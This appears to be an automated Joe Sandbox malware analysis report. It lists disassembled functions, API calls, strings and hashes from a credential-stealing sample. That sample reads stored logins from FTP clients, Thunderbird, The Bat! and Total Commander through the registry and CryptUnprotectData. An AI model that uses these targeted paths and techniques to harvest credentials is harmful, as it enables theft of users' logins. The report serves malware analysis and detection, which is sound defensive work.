Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: lstrlen$FreeLocal
String ID: BlazeFtp$LastAddress$LastPassword$LastPort$LastUser$Software\FlashPeak\BlazeFtp\Settings$\BlazeFtp$site.dat
API String ID: 1884169789-2976447346
Opcode ID: e570d7787626a09a0829d2cc7acc607ec1111b59b37f083f6410b3172a5ad351
Instruction ID: fa58062dc89e8d8c6eba8e248f6b3770d8bda9bc2d5fac131e608830897907ea
Opcode Fuzzy Hash: e570d7787626a09a0829d2cc7acc607ec1111b59b37f083f6410b3172a5ad351
Instruction Fuzzy Hash: 6731087194020ABADF126BA1CC06FEE7E32AF84748F11413BB510741F2D77A5A91AB48

Function 0040327B Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 133stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0040190B: LocalAlloc.KERNEL32(00000040,$@,?,004024E9,?), ref: 00401919

StrStrIA.SHLWAPI(?,Content-Length:), ref: 00403301
lstrlenA.KERNEL32(Content-Length:,00000000,?,Content-Length:), ref: 00403312
StrToIntA.SHLWAPI(00000001,00000001,00000000,Content-Length:,00000000,?,Content-Length:), ref: 00403333
StrStrIA.SHLWAPI(?,Location:,?,Content-Length:), ref: 0040334A
lstrlenA.KERNEL32(Location:,00000000,?,Location:,?,Content-Length:), ref: 0040335B

Strings

Location:, xrefs: 00403342, 00403356
Content-Length:, xrefs: 004032F9, 0040330D

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: lstrlen$AllocLocal
String ID: Content-Length:$Location:
API String ID: 2140729754-2400408565
Opcode ID: 1ff60d320efae8d8fd6a8f89dd9caa27ee76eb4b5e181dd29503af328c8fd158
Instruction ID: 0dc70e399785ca8dc68f2f9f5be05bd85ac4a8be2f0b5de4bed7d03bef632bdd
Opcode Fuzzy Hash: 1ff60d320efae8d8fd6a8f89dd9caa27ee76eb4b5e181dd29503af328c8fd158
Instruction Fuzzy Hash: D941E535A04249BBDB10AFA1CC85B9EFF79EF41309F20817BB510B51E1DB7D9A819618

Function 0040701B Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 121registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,?), ref: 00407031
RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00407065
RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00407206

Part of subcall function 004018F4: LocalFree.KERNEL32(00000000,?,00402510,?,?,?,?,?,?), ref: 00401900

Strings

Username, xrefs: 004070DE
Port, xrefs: 00407101
Hostname, xrefs: 004070C0
Password, xrefs: 004070A2

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: CloseEnumFreeLocalOpen
String ID: Hostname$Password$Port$Username
API String ID: 3369285772-1811172798
Opcode ID: a41d979360f7e32c87eedb7931e3886f743bbd8ddd06f8d10cae3088f2593e3b
Instruction ID: 6516cce8fb95ef8718eb39ae74a5b48e395b1ccc0a8d9f0c1ebf5f7c45b768d3
Opcode Fuzzy Hash: a41d979360f7e32c87eedb7931e3886f743bbd8ddd06f8d10cae3088f2593e3b
Instruction Fuzzy Hash: 7C413A7280011CEADF216B50CC06BDD7ABABF44308F00C0BAB554741E1DF7A5AD2AF99

Function 00406DE7 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 110registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,?), ref: 00406DFD
RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406E31
RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406FA6

Part of subcall function 004018F4: LocalFree.KERNEL32(00000000,?,00402510,?,?,?,?,?,?), ref: 00401900

Strings

Password, xrefs: 00406E69
Server, xrefs: 00406E87
Username, xrefs: 00406EA5
FtpPort, xrefs: 00406EC8

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: CloseEnumFreeLocalOpen
String ID: FtpPort$Password$Server$Username
API String ID: 3369285772-1828875246
Opcode ID: 24c40d2f2cfbbb02112a3b83b71eb3fa2959930d61feeba99e5e60d278ee1cd6
Instruction ID: 7b7708260c288e77f5b8bca963c71f9da4941e60b0aee441a244f3ed0216979d
Opcode Fuzzy Hash: 24c40d2f2cfbbb02112a3b83b71eb3fa2959930d61feeba99e5e60d278ee1cd6
Instruction Fuzzy Hash: AA411932800219FADF216B51CC06BDD7AB9BF44308F15C0BAB554740B1DB7A5AE2AF98

Function 0040E4F5 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 97registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040E505
RegCloseKey.ADVAPI32(?,?,?,00000000,?,?,?,?,?), ref: 0040E635

Part of subcall function 0040465C: CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 004046A8
Part of subcall function 0040465C: LocalFree.KERNEL32(00000000), ref: 004046DC

Part of subcall function 00401607: lstrlenA.KERNEL32(00000000), ref: 00401613

Strings

UserID, xrefs: 0040E529
xflags, xrefs: 0040E540
Site, xrefs: 0040E514
Folder, xrefs: 0040E56A
Port, xrefs: 0040E555

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: CloseCryptDataFreeLocalOpenUnprotectlstrlen
String ID: Folder$Port$Site$UserID$xflags
API String ID: 2167297517-269738940
Opcode ID: 447ebd8c7e1c7175461460fc7f64bb9faa2806f197a07f167ac23d59bb9403e2
Instruction ID: 4074b47011b42a884ba02d5608bbd2b1e10f8c966accfa876ff4afdc1c20ff64
Opcode Fuzzy Hash: 447ebd8c7e1c7175461460fc7f64bb9faa2806f197a07f167ac23d59bb9403e2
Instruction Fuzzy Hash: 9931A93181021ABADF126FD1CC06BEE7B72BF54348F50883AB521751F1D77A9A61EB48

Function 00407B94 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 89registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 00407BA7
RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407BDB
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407CF6

Strings

sites.ini, xrefs: 00407C6D, 00407CA6
sites.dat, xrefs: 00407C55, 00407C8E
InstallPath, xrefs: 00407C13
DataDir, xrefs: 00407C2E

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: DataDir$InstallPath$sites.dat$sites.ini
API String ID: 1332880857-3870687875
Opcode ID: 1a63c92e64cf8971359510c085174154593fb8da296ae2ab1caed5cf57ebadb2
Instruction ID: e015fb7150b4fef979a4cbd31ffdff19fc3bd018de425a573e9a50aeac1ce165
Opcode Fuzzy Hash: 1a63c92e64cf8971359510c085174154593fb8da296ae2ab1caed5cf57ebadb2
Instruction Fuzzy Hash: 5631F87190421CFADF216B50CC42BDD7ABABF44308F1080BAB658750A1DB796B91AF89

Function 0040FB2D Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 53COMMON

Download Yara Rule

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 0040FB5B

Part of subcall function 00409F00: StrStrIA.SHLWAPI(?,?), ref: 00409F0C
Part of subcall function 00409F00: RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409F83
Part of subcall function 00409F00: RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409FAF
Part of subcall function 00409F00: RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409FF7

SetCurrentDirectoryA.KERNEL32(?,?), ref: 0040FBA0
GetCurrentDirectoryA.KERNEL32(00000104,?,?,?), ref: 0040FBBB
SetCurrentDirectoryA.KERNEL32(?,?,?,?), ref: 0040FC00

Strings

Software\Mozilla, xrefs: 0040FB6A, 0040FB87, 0040FBCA, 0040FBE7
Thunderbird, xrefs: 0040FB65, 0040FB82, 0040FBC5, 0040FBE2
\Thunderbird, xrefs: 0040FB60, 0040FB7D, 0040FBC0, 0040FBDD

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: CurrentDirectory$CloseEnumOpen
String ID: Software\Mozilla$Thunderbird$\Thunderbird
API String ID: 3062143572-138716004
Opcode ID: c73157dc42e351fe24aeac53d210d4cbaf8a01f958b5b4d604d304093ba6a40b
Instruction ID: 986410cbbe359704e9777fd14a99ec1d9ac4ba3d65956af62eaa0ac6e1f8db38
Opcode Fuzzy Hash: c73157dc42e351fe24aeac53d210d4cbaf8a01f958b5b4d604d304093ba6a40b
Instruction Fuzzy Hash: 2C114FB0680319BADB10EF51CC53FD83A689B50744F214076B608B50E3DBF9AAD0CB5C

Function 00407D4B Relevance: 12.1, APIs: 3, Strings: 5, Instructions: 100stringCOMMON

Download Yara Rule

APIs

StrStrA.SHLWAPI(00542E18,unleap.exe), ref: 00407D7D
lstrlenA.KERNEL32(unleap.exe,00000001,00542E18,unleap.exe), ref: 00407D92

Part of subcall function 00402469: lstrlenA.KERNEL32(?), ref: 0040247D
Part of subcall function 00402469: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 0040249C
Part of subcall function 00402469: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 004024AE
Part of subcall function 00402469: lstrlenA.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 004024C0

Part of subcall function 004018F4: LocalFree.KERNEL32(00000000,?,00402510,?,?,?,?,?,?), ref: 00401900

StrStrIA.SHLWAPI(00541FA8,leapftp,00542E18,unleap.exe), ref: 00407DD6

Strings

SOFTWARE\LeapWare, xrefs: 00407E4C, 00407E5F
sites.ini, xrefs: 00407DBB, 00407E00
sites.dat, xrefs: 00407DA7, 00407DEC
leapftp, xrefs: 00407DD0
unleap.exe, xrefs: 00407D77, 00407D8D

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: lstrlen$FreeLocal
String ID: SOFTWARE\LeapWare$leapftp$sites.dat$sites.ini$unleap.exe
API String ID: 1884169789-1497043051
Opcode ID: 9ff28a2ddcddeda16e660b6ff56c27802fee60b2161290d0ca876d338eb3d0ca
Instruction ID: 7b98be79f81809e709d9a4bce74438115821991d7e5517fbbb381e1f428634a5
Opcode Fuzzy Hash: 9ff28a2ddcddeda16e660b6ff56c27802fee60b2161290d0ca876d338eb3d0ca
Instruction Fuzzy Hash: E521B470904504BAEB112B21CC02FEA3E179F80354F24443BB905751E7CBBD5FD2929D

Function 0040F254 Relevance: 12.1, APIs: 1, Strings: 7, Instructions: 90COMMON

Download Yara Rule

APIs

Part of subcall function 004018F4: LocalFree.KERNEL32(00000000,?,00402510,?,?,?,?,?,?), ref: 00401900

wsprintfA.USER32 ref: 0040F329

Strings

Default, xrefs: 0040F2B8
Dir #%d, xrefs: 0040F320
Working Directory, xrefs: 0040F25C
ProgramDir, xrefs: 0040F28A
Software\RIT\The Bat!, xrefs: 0040F261, 0040F28F
Count, xrefs: 0040F2E8
Software\RIT\The Bat!\Users depot, xrefs: 0040F2BD, 0040F2ED, 0040F339

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: FreeLocalwsprintf
String ID: Count$Default$Dir #%d$ProgramDir$Software\RIT\The Bat!$Software\RIT\The Bat!\Users depot$Working Directory
API String ID: 988369812-1921698578
Opcode ID: a3ef6d431f80d817ff1cd45ed05f25d3501f438ee6e2fc4bcdb6460b9f72d230
Instruction ID: 9536a26f62d87d92dda95ff7fa96823146c1e7de4262c71b9d30f957717cf2e5
Opcode Fuzzy Hash: a3ef6d431f80d817ff1cd45ed05f25d3501f438ee6e2fc4bcdb6460b9f72d230
Instruction Fuzzy Hash: B131F771D00208FADF11BBA1CD42ADDBB72AF00758F20807BB924B55E1D7799F58AB48

Function 00404ED1 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 151COMMON

Download Yara Rule

APIs

Part of subcall function 0040190B: LocalAlloc.KERNEL32(00000040,$@,?,004024E9,?), ref: 00401919

GetWindowsDirectoryA.KERNEL32(?,00000104,00000105), ref: 00404F10

Strings

Software\Ghisler\Windows Commander, xrefs: 00404FA9, 00404FC9, 0040504B, 0040506A
InstallDir, xrefs: 00404FA4, 00404FF5, 00405046, 00405095
Software\Ghisler\Total Commander, xrefs: 00404FFA, 0040501A, 0040509A, 004050B9
\GHISLER, xrefs: 00404F50, 00404F6F, 00404F8E
FtpIniName, xrefs: 00404FC4, 00405015, 00405065, 004050B4

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: AllocDirectoryLocalWindows
String ID: FtpIniName$InstallDir$Software\Ghisler\Total Commander$Software\Ghisler\Windows Commander$\GHISLER
API String ID: 3186838798-3636168975
Opcode ID: 17ca9c81d94dd63a93fedb0317eefa9fec71737b1ad01ce7cd9fdb13dad609b7
Instruction ID: 5ed8e385ddb8741f3a2d5b095824f2ba492a62f7d3c15441c2dce2e623aa42ca
Opcode Fuzzy Hash: 17ca9c81d94dd63a93fedb0317eefa9fec71737b1ad01ce7cd9fdb13dad609b7
Instruction Fuzzy Hash: F45112B1A80219B9DF01BBE1CC03FAD3A669F90788F25817B7A14B40F1DB7D49919A5C

Function 00404B9B Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,?), ref: 00404BB1
RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00404BE5
RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00404D0C

Strings

User, xrefs: 00404C59
Password, xrefs: 00404C1D
HostName, xrefs: 00404C3B

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: HostName$Password$User
API String ID: 1332880857-1253078594
Opcode ID: f572c169c01acb4e0d858261cd28209452183dab80e656892684e8374239ece7
Instruction ID: 96250fc842fedf21946fbc0c7b81ba549857ecd1430347191a29d189e377c1b9
Opcode Fuzzy Hash: f572c169c01acb4e0d858261cd28209452183dab80e656892684e8374239ece7
Instruction Fuzzy Hash: 1D31E771840119BADF22AB51CC06BDD7AB9BF40308F10C0BAB558751B1DB795AD2AF98

Function 004090D5 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 83registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 004090E8
RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040911C
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040920E

Strings

wiseftpsrvs.bin, xrefs: 004091C4
wiseftp.ini, xrefs: 004091AC
wiseftpsrvs.ini, xrefs: 00409194

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: wiseftp.ini$wiseftpsrvs.bin$wiseftpsrvs.ini
API String ID: 1332880857-3184955129
Opcode ID: 1f7f33fed0ef77db53f0d9806de287de843012427135b813592c62b40aaf3ede
Instruction ID: 73f76612c1b73da15edfcd094bed8864fe9b844aff7cab852813e99c301d0066
Opcode Fuzzy Hash: 1f7f33fed0ef77db53f0d9806de287de843012427135b813592c62b40aaf3ede
Instruction Fuzzy Hash: 9731E771900109FADF216F61CC42BDD7ABABF40308F14C4BAB554750E2DE795EA1AF98

Function 0040A08F Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 47COMMON

Download Yara Rule

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 0040A0EC
SetCurrentDirectoryA.KERNEL32(?,?), ref: 0040A131

Part of subcall function 00401E88: lstrlenA.KERNEL32(?), ref: 00401EA9
Part of subcall function 00401E88: lstrlenA.KERNEL32(00000000,?), ref: 00401EB3
Part of subcall function 00401E88: lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 00401EC7
Part of subcall function 00401E88: lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 00401ED0

Part of subcall function 004018F4: LocalFree.KERNEL32(00000000,?,00402510,?,?,?,?,?,?), ref: 00401900

Strings

Software\Mozilla, xrefs: 0040A0FB, 0040A118
\Mozilla\Firefox\, xrefs: 0040A0B2, 0040A0F1, 0040A10E
fireFTPsites.dat, xrefs: 0040A0C3
Firefox, xrefs: 0040A0F6, 0040A113

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: CurrentDirectorylstrlen$FreeLocallstrcatlstrcpy
String ID: Firefox$Software\Mozilla$\Mozilla\Firefox\$fireFTPsites.dat
API String ID: 3007406096-624000163
Opcode ID: 94623372bfb2d21f1685055c8992226c84d47227d5508bd715d737690d63e15f
Instruction ID: d40e6bff5471d4cd777bcf0cde274d7fea09c41e329ed5a365a323144afc3d9e
Opcode Fuzzy Hash: 94623372bfb2d21f1685055c8992226c84d47227d5508bd715d737690d63e15f
Instruction Fuzzy Hash: B50112716C0609FADB10FB51CC47FDD3A699F90788F10412B7A04B50E2DAB959D0969D

Function 00409F00 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85registryCOMMON

Download Yara Rule

APIs

StrStrIA.SHLWAPI(?,?), ref: 00409F0C
RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409F83
RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409FAF
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409FF7

Part of subcall function 00402469: lstrlenA.KERNEL32(?), ref: 0040247D
Part of subcall function 00402469: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 0040249C
Part of subcall function 00402469: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 004024AE
Part of subcall function 00402469: lstrlenA.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 004024C0

Part of subcall function 00401E88: lstrlenA.KERNEL32(?), ref: 00401EA9
Part of subcall function 00401E88: lstrlenA.KERNEL32(00000000,?), ref: 00401EB3
Part of subcall function 00401E88: lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 00401EC7
Part of subcall function 00401E88: lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 00401ED0

Part of subcall function 004018F4: LocalFree.KERNEL32(00000000,?,00402510,?,?,?,?,?,?), ref: 00401900

Strings

PathToExe, xrefs: 00409F17

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: lstrlen$CloseEnumFreeLocalOpenlstrcatlstrcpy
String ID: PathToExe
API String ID: 3012581338-1982016430
Opcode ID: 490e87ac5c84d52e22241c128ad48efc0cfca60f9716826e83606afa0a4aab13
Instruction ID: d437394a875704394b0217962e71823c610bd95a03ecef1c515e51d418b271c9
Opcode Fuzzy Hash: 490e87ac5c84d52e22241c128ad48efc0cfca60f9716826e83606afa0a4aab13
Instruction Fuzzy Hash: 3731D67194420ABADF016FE1CC02FEF7A75AF14348F144076B610B41F2DB799960AB59

Function 00402844 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 82COMMON

Download Yara Rule

APIs

GetTempPathA.KERNEL32(00000104,?), ref: 0040287A
GetHGlobalFromStream.OLE32(?,?,?,00000000,?,00000000,?,00000104,?), ref: 004028FC
GlobalLock.KERNEL32(?), ref: 00402908
GlobalUnlock.KERNEL32(?), ref: 0040292A

Part of subcall function 00401E34: lstrlenA.KERNEL32(?), ref: 00401E55
Part of subcall function 00401E34: lstrlenA.KERNEL32(00000000,?), ref: 00401E5F
Part of subcall function 00401E34: lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 00401E73
Part of subcall function 00401E34: lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 00401E7C

Part of subcall function 00401E88: lstrlenA.KERNEL32(?), ref: 00401EA9
Part of subcall function 00401E88: lstrlenA.KERNEL32(00000000,?), ref: 00401EB3
Part of subcall function 00401E88: lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 00401EC7
Part of subcall function 00401E88: lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 00401ED0

Strings

Software\WinRAR, xrefs: 00402854

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: lstrlen$Global$lstrcatlstrcpy$FromLockPathStreamTempUnlock
String ID: Software\WinRAR
API String ID: 2536169780-224198155
Opcode ID: c228d8f29b4bbf335a18e163b28590f6e2fc8199ca3417e222d331081b7ec13e
Instruction ID: 7e571d5fb8ff8b76c5d46e44ce64646fdbe1b02ef4e227fcc485b7895c5a3033
Opcode Fuzzy Hash: c228d8f29b4bbf335a18e163b28590f6e2fc8199ca3417e222d331081b7ec13e
Instruction Fuzzy Hash: AC211DB6A0010DBACF01ABE1CD4ADEEBB7DAF14348F104476B610B10F1D6BD9A949B18

Function 00404A8D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,?), ref: 00404AA3
RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,00000000,00000000,?,?), ref: 00404ADC
StrStrIA.SHLWAPI(?,Line), ref: 00404B0D
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000001,00000000,00000000,?,Line), ref: 00404B92

Strings

Line, xrefs: 00404B01

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: CloseEnumOpenValue
String ID: Line
API String ID: 4012628704-1898322888
Opcode ID: 514fa578dfee4ba82bfb5fa4791be43d1ddf10ba2a0a50f6d9ab5609a06e0caa
